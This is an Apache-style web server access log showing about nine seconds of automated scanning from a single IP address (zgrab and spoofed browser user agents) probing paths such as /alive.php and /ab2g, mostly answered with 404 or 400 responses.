167.71.239.65 - - [03/Oct/2024:09:24:34 +0200] "GET /ab2g HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
167.71.239.65 - - [03/Oct/2024:09:24:34 +0200] "GET /ab2h HTTP/1.1" 404 - "-" "Mozilla/5.0 zgrab/0.x"
167.71.239.65 - - [03/Oct/2024:09:24:35 +0200] "GET /alive.php HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.71.239.65 - - [03/Oct/2024:09:24:39 +0200] "GET /" 400 474 "-" "-"
167.71.239.65 - - [03/Oct/2024:09:24:40 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.71.239.65 - - [03/Oct/2024:09:24:40 +0200] "GET /" 400 474 "-" "-"
167.71.239.65 - - [03/Oct/2024:09:24:41 +0200] "GET /t4 HTTP/1.1" 404 - "-" "Mozilla/5.0"
167.71.239.65 - - [03/Oct/2024:09:24:41 +0200] "GET /" 400 474 "-" "-"
167.71.239.65 - - [03/Oct/2024:09:24:42 +0200] "GET /favicon.ico HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36"
167.71.239.65 - - [03/Oct/2024:09:24:43 +0200] "GET / HTTP/1.1" 200 20819 "-" "Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 10.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)"
